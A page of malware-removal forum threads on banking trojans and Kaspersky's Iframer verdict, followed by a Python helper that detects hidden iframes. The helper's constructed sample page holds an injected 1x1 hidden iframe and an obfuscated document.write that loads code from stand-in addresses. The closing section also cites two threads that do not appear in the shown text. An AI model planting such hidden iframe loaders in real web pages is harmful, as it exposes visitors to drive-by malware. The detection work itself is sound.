I must admit that I have been impatient and have continued to run scans in attempts to "do something"
So, I may need to post new logs whenever I get a helper assigned to my case.
The trojan appears to have mutated from Trojan-Banker.Win32.Banbra.aedx to Trojan-Dropper.Win32.TDSS.abhd

A:Trojan-Banker and HEUR:Exploit.Script.Generic and Google Redirect

Hello and Welcome to the forums!

My name is Gringo and I'll be glad to help you with your computer problems.

Some things to remember while we are working together.
Do not run any other tool until instructed to do so!
Please Do not Attach logs or put in code boxes.
Tell me about any problems that have occurred during the fix.
Tell me of any other symptoms you may be having as these can help also.
Do not run anything while running a fix.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

Click on the Watch Topic Button and select Immediate Notification and click on proceed, this will help you to get notified faster when I have replied and make the cleaning process faster.

In order for me to see the status of the infection I will need a new set of logs to start with.

Please print out or make a copy in Notepad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.

DeFogger:
Please download DeFogger to your desktop.
Double click DeFogger to run the tool.
The application window will appear
Click the Disable button to disable your CD Emulation drivers
Click Yes to continue
A 'Finished!' message will ap... Read more

23 more replies

Hi,
I hope you can help. A few months ago Microsoft Security Essentials (MSE) detected and attempted to remove a trojan called win32/Anaki.A!plock. MSE would display an information window which said it had successfully removed the threat and no further action was required, only for it to reappear again within a minute. See a screenshot of the MSE history tab attached. The information that Microsoft has about win32/Anaki.A!plock is very vague/generic and I cannot find any more information on it, or whether other vendors have it listed under another name. After trying many different scanners with no luck I discovered that in the same folder as the infected file was another suspicious looking file (see attached). I tried to remove that file but Windows would not let me because it was "open by the WMI Driver Service". I was able to remove the suspect file by starting the PC with a portable Linux OS. I restarted the PC and the trojan was gone. A month passed with no infection and then it reappeared. I removed it again using the same method. This time it was only a couple of weeks before the trojan reappeared. I did it again and this time it was less than a week before it appeared again.
I decided to remove MSE and the offending file, then install a trial version of Norton AV. I was hoping it would detect the same infection and remove it fully. Also Norton may have more information on it. Four days after the install, Norton detected it as SAPE.Heur.3185. The behaviour of Norton's ... Read more

A:Trojan win32/Anaki.A!plock or SAPE.Heur.3185 unable to remove

Hi there,

my name is Marius and I will assist you with your malware related problems.

Before we move on, please read the following points carefully.
First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
Perform everything in the correct order. Sometimes one step requires the previous one.
If you have any problems while following my instructions, Stop there and tell me the exact nature of your problem.
Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
My first language is not English. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.

Important: To help me reviewing your logs, please post them in code boxes. You can create them by clicking on the <>-symbol on top of the reply window.

HijackThis is not the preferred initial scanning tool in this forum. With today's malware, a more comprehensive set of logs i... Read more

16 more replies

Two days ago, I was browsing as per normal through Chrome when Kaspersky encountered and blocked the trojan detailed above.  Since it declared the program was blocked, I thought nothing of it after doing a cursory Malwarebytes scan, and another with Kaspersky.  
 
Today I rebooted my computer for the first time since that warning, and the first thing I noticed was a little padlock-shaped icon down in my toolbar that appeared and disappeared fairly quickly (it's apparently some kind of Windows process according to my googling). When I tried to access Chrome it refused to launch, even though the program existed in the task manager. I rebooted the computer several times only for the same thing to happen. It finally successfully launched about an hour later, and it appears to be running normally, but since that's super abnormal for my fairly new PC I thought I'd check in for some advice. Is there a remnant of the trojan on my computer or was it just a fluke?
 
ETA: I get a message when I try to check for Windows updates that the server isn't running and I should relaunch Windows.

A:Chrome takes a time to launch after Kaspersky blocks HEUR: Trojan.Script.Iframer

Download Security Check from here or here and save it to your Desktop.
Double-click SecurityCheck.exe
Follow the onscreen instructions inside of the black box.
A Notepad document should open automatically called checkup.txt; please post the contents of that document.
NOTE 1. If one of your security applications (e.g., third-party firewall) requests permission to allow DIG.EXE access the Internet, allow it to do so.
NOTE 2. SecurityCheck may produce some false warning(s), so leave the results reading to me.
NOTE 3. If you receive UNSUPPORTED OPERATING SYSTEM! ABORTED! message restart computer and Security Check should run

Please download Farbar Service Scanner (FSS) and run it on the computer with the issue.
Make sure the following options are checked:
Internet Services
Windows Firewall
System Restore
Security Center/Action Center
Windows Update
Windows Defender
Other Services
Press "Scan".
It will create a log (FSS.txt) in the same directory the tool is run.
Please copy and paste the log to your reply.

Please download MiniToolBox and run it.
Checkmark following boxes:
Report IE Proxy Settings
Report FF Proxy Settings
List content of Hosts
List IP configuration
List Winsock Entries
List last 10 Event Viewer log
List Installed Programs
List Devices (do NOT change any settings here)
List Users, Partitions and Memory size
List Restore Points
Click Go and post the result.

Please download Malwarebytes Anti-Malware (MBAM) to your desktop.
NOTE. If you already have MBAM 2.0 installed scroll down.
Double-click ... Read more

30 more replies
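Three of the threads above (the abduzeedo.com visit, the svchost.exe popups, and the Chrome launch problem) involve Kaspersky's HEUR:Trojan.Script.Iframer verdict. That verdict name refers to web content that injects an iframe the visitor never sees: a 1x1 or CSS-hidden frame, or one written at run time by an obfuscated script, pointing at a third-party loader. The following helper, an added example and not code from any of the posters or from Kaspersky, shows how an analyst can triage a saved copy of a suspect page for that pattern. The sample HTML, the example.com page host, the RFC 5737 addresses and the 5-pixel threshold are all constructed for the demonstration.

```python
"""Triage helper for the HEUR:Trojan.Script.Iframer class of detection:
find iframes a visitor would never see (tiny, hidden by CSS, or written
at run time by an obfuscated script) and report where they point.
Added example; the sample page, hosts and thresholds are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

TINY_PX = 5  # assumed threshold: frames this small are invisible but still load

# CSS that hides an element or parks it far off-screen.
HIDDEN_CSS = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}",
    re.I,
)

# document.write() of an iframe, usually wrapped in unescape()/fromCharCode
# so the literal string "<iframe" never appears in the page source.
DYNAMIC_IFRAME = re.compile(
    r"document\.write\s*\(.*?(?:<iframe|unescape\s*\(|fromCharCode)",
    re.I | re.S,
)


def _tiny(value):
    """True when a width/height attribute is TINY_PX or less."""
    m = re.match(r"\s*(\d+)", value or "")
    return m is not None and int(m.group(1)) <= TINY_PX


class IframeScanner(HTMLParser):
    """Collects suspicious <iframe> tags and iframe-writing scripts."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []
        self._in_script = False

    def _third_party(self, src):
        host = (urlparse(src).hostname or "").lower()
        return bool(host) and host != self.page_host and not host.endswith("." + self.page_host)

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            return
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        if _tiny(a.get("width")) or _tiny(a.get("height")):
            reasons.append("tiny dimensions")
        if "hidden" in a or HIDDEN_CSS.search(a.get("style", "")):
            reasons.append("hidden by CSS")
        # A frame the user cannot see is the signal; where it points tells
        # the analyst whether it is an injected third-party loader.
        if reasons:
            src = a.get("src", "")
            if self._third_party(src):
                reasons.append("third-party src")
            self.findings.append({"src": src, "reasons": reasons})

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands the whole <script> body to handle_data as one chunk.
        if self._in_script and DYNAMIC_IFRAME.search(data):
            self.findings.append(
                {"src": "<written by script>", "reasons": ["document.write of iframe"]}
            )


def scan_html(html, page_host):
    """Return a list of findings ({'src', 'reasons'}) for one saved page."""
    scanner = IframeScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a legitimate visible embed, an injected 1x1 hidden frame
# pointing at an RFC 5737 documentation address, and an obfuscated writer.
SAMPLE_HTML = """<html><body>
<h1>Concept art</h1>
<iframe width="560" height="315" src="https://www.youtube.com/embed/abc123"></iframe>
<iframe src="http://203.0.113.7/in.php" width="1" height="1" frameborder="0"
        style="display:none"></iframe>
<script>
document.write(unescape('%3Ciframe src=%22http://198.51.100.9/x%22 width=1 height=1%3E%3C/iframe%3E'));
</script>
</body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML, "example.com"):
        print(f["src"], "->", ", ".join(f["reasons"]))
```

Run against the constructed page it reports the 1x1 hidden frame (tiny, hidden, third-party) and the script-written one, and leaves the visible YouTube embed alone. The point for the threads above: a verdict like this says the page you visited carried the injection; it does not by itself mean anything ran on your machine, which is why the helpers go on to ask for FRST, Security Check and similar host-side logs. Popups that start before any browser opens, as in the svchost.exe thread, point at something on the host rather than at a page.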